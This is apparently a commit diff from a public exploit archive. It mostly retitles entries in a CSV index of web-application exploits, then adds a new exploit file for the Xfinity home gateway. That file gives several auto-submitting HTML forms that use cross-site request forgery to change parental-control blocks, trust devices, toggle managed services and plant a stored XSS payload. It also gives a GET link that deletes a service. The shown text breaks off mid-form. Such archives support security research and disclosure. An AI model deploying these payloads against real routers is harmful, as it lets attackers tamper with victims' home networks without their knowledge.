 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
-8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion",2009-03-17,Garry,php,webapps,0
+8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0
 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
-8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
+8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0
 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0
 8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0
@@ -20711,7 +20714,7 @@ id,file,description,date,author,platform,type,port
 8334,platforms/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusion",2009-04-01,ahmadbady,php,webapps,0
 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0
 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
-8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
+8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
@@ -21676,7 +21679,7 @@ id,file,description,date,author,platform,type,port
 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps,0
 10261,platforms/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80
 10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,cr4wl3r,linux,webapps,80
-10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities",2009-12-01,cr4wl3r,linux,webapps,80
+10263,platforms/linux/webapps/10263.txt,"Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion",2009-12-01,cr4wl3r,linux,webapps,80
 10272,platforms/php/webapps/10272.txt,"Joomla! Component Joaktree 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0
 10273,platforms/php/webapps/10273.txt,"Joomla! Component MojoBlog 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0
 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum (SMF) - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0
@@ -23744,7 +23747,7 @@ id,file,description,date,author,platform,type,port
 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0
 14647,platforms/php/webapps/14647.php,"PHP-Fusion - Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0
 14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
-14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
+14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
 14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
 14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
@@ -25084,7 +25087,7 @@ id,file,description,date,author,platform,type,port
 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0
 18348,platforms/php/webapps/18348.txt,"w-CMS 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0
 18350,platforms/php/webapps/18350.txt,"WordPress Plugin Age Verification 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0
-18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0
+18352,platforms/php/webapps/18352.txt,"Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0
 18353,platforms/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0
 18355,platforms/php/webapps/18355.txt,"WordPress Plugin Count Per Day - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0
 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0
@@ -27178,7 +27181,7 @@ id,file,description,date,author,platform,type,port
 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps,0
 25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,php,webapps,0
 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0
-25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - index.php SQL Injection",2005-02-09,Zeelock,php,webapps,0
+25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - 'index.php' SQL Injection",2005-02-09,Zeelock,php,webapps,0
 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0
 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
 25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0
@@ -28009,7 +28012,7 @@ id,file,description,date,author,platform,type,port
 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0
 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0
 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0
-26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 - Lang.php Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0
+26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0
 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - events.php HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0
 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - Description Field HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0
 26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps,0
@@ -28120,7 +28123,7 @@ id,file,description,date,author,platform,type,port
 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
 26380,platforms/php/webapps/26380.txt,"Chipmunk Forum - recommend.php ID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory - recommend.php entryID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
-26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0
+26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 - 'detail.php' HTML Injection",2005-10-22,sikikmail,php,webapps,0
 26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusion",2005-10-22,abducter_minds@yahoo.com,php,webapps,0
 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x - 'index.php' Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0
 26388,platforms/php/webapps/26388.txt,"Nuked-klaN 1.7 Download Module - 'dl_id' Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0
@@ -30280,7 +30283,7 @@ id,file,description,date,author,platform,type,port
 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - lire-avis.php aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0
 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0
 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0
-29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0
+29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0
 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0
 29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0
 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0
@@ -30462,7 +30465,7 @@ id,file,description,date,author,platform,type,port
 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0
 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0
 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0
-30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 - Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0
+30028,platforms/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps,0
 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80
 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80
 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80
@@ -30787,7 +30790,7 @@ id,file,description,date,author,platform,type,port
 29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal - Down_Indir.asp SQL Injection",2007-04-30,ertuqrul,asp,webapps,0
 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
 29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0
-29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 - Stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0
+29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0
 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0
 29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0
 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0
@@ -31889,7 +31892,6 @@ id,file,description,date,author,platform,type,port
 31793,platforms/php/webapps/31793.txt,"Horde Turba 3.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-14,"Ivan Javier Sanchez",php,webapps,0
 31794,platforms/php/webapps/31794.txt,"PicsEngine 1.0 - 'index.php' Cross-Site Scripting",2008-05-14,ZoRLu,php,webapps,0
 31795,platforms/php/webapps/31795.txt,"Links Pile - 'link.php' SQL Injection",2008-08-14,HaCkeR_EgY,php,webapps,0
-31796,platforms/php/webapps/31796.txt,"Internet PhotoShow - 'login_admin' Parameter Unauthorized Access",2008-05-14,t0pP8uZz,php,webapps,0
 31797,platforms/asp/webapps/31797.txt,"philboard 0.5 - W1L3D4_foruma_yeni_konu_ac.asp forumid Parameter SQL Injection",2008-05-14,U238,asp,webapps,0
 31798,platforms/php/webapps/31798.txt,"philboard 0.5 - W1L3D4_konuoku.asp id Parameter SQL Injection",2008-05-14,U238,php,webapps,0
 31799,platforms/php/webapps/31799.txt,"philboard 0.5 - W1L3D4_konuya_mesaj_yaz.asp Multiple Parameter SQL Injection",2008-05-14,U238,php,webapps,0
@@ -32501,7 +32503,7 @@ id,file,description,date,author,platform,type,port
 32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0
 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",hardware,webapps,80
-33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80
 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0
@@ -32666,7 +32668,7 @@ id,file,description,date,author,platform,type,port
 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80
 40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80
 40082,platforms/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80
-33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - 'category.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0
 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0
 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0
@@ -32705,10 +32707,10 @@ id,file,description,date,author,platform,type,port
 33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 - SQL Injection",2009-08-25,"Andrew Horton",php,webapps,0
 33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0
 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0
-33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
-33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
-33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
-33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0
 33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
 33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
@@ -32805,7 +32807,7 @@ id,file,description,date,author,platform,type,port
 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0
 33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80
 33390,platforms/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0
-33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0
+33391,platforms/php/webapps/33391.txt,"Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0
 33392,platforms/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0
 33393,platforms/php/webapps/33393.txt,"Joomla! Component You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0
 33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0
@@ -33301,9 +33303,9 @@ id,file,description,date,author,platform,type,port
 34294,platforms/php/webapps/34294.txt,"Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
 34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 - 'magpie_debug.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 - 'css_optimiser.php' Cross-Site Scripting",2010-07-11,"John Leitch",php,webapps,0
-34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
+34298,platforms/php/webapps/34298.py,"CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
 34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 - 'default_cms_lang' Parameter Local File Inclusion",2010-07-11,"John Leitch",php,webapps,0
-34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
+34300,platforms/php/webapps/34300.py,"CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0
 34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0
 34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Inclusion",2014-08-09,Vulnerability-Lab,ios,webapps,8000
 34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection",2014-08-09,Vulnerability-Lab,ios,webapps,8080
@@ -33406,7 +33408,7 @@ id,file,description,date,author,platform,type,port
 34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34475,platforms/php/webapps/34475.txt,"Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
-34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
+34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps,0
 34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
 34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0
@@ -34427,7 +34429,7 @@ id,file,description,date,author,platform,type,port
 36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
 36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
-36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
+36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0
 36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0
 36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0
@@ -36832,3 +36834,7 @@ id,file,description,date,author,platform,type,port
 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
+40850,platforms/php/webapps/40850.txt,"Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps,0
+40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
+40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
+40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0

platforms/hardware/webapps/40853.txt

@@ -0,0 +1,348 @@
+EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY
+AUTHOR: Pabstersac
+DATE: 1ST OF AUGUST 2016
+CVE: N/A
+CATEGORY: REMOTE
+CONTACT: pabstersac@gmail.com
+
+IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME.
+CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE.
+VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED.
+
+1) ADD BLOCKED SITE
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
+
+<input type="hidden" name='BlockInfo' value='{"URL": "http://test1.com", "alwaysBlock": "true"}'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+2) ADD BLOCKED KEYWORD
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
+
+<input type="hidden" name='BlockInfo' value=‘{“Keyword”: "http://test1.com", "alwaysBlock": "true"}'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+3) REMOVE BLOCKED SITE OR KEYWORD
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_remove_blockedSite.php" method="post">
+
+<input type="hidden" name='removeBlockInfo' value='{"InstanceID": "6"}'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+4) TRUST/UNTRUST DEVICES
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_trust_computer.php" method="post">
+
+<input type="hidden" name='TrustFlag' value='{"trustFlag": "true", "HostName": "test", "IPAddress": "10.0.0.82"}'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+5) DISABLE/ENABLE MANAGED SITES
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_enable_manageSite.php" method="post">
+
+<input type="hidden" name='Enable' value='{"Enable": "true"}'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;)
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
+
+<input type="hidden" name='add' value='true'>
+<input type="hidden" name='service' value='<img src=x onerror=alert(0)>'>
+<input type="hidden" name='protocol' value='UDP'>
+<input type="hidden" name='startPort' value='1234'>
+<input type="hidden" name='endPort' value='1234'>
+<input type="hidden" name='block' value='true'>
+
+</form>
+
+<script>document.x.submit();</script>
+
+
+7) DELETE MANAGED SERVICE
+
+http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1
+
+
+8) DISABLE/ENABLE MANAGED SERVICES
+
+<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
+
+<input type="hidden" name='set' value='true'>
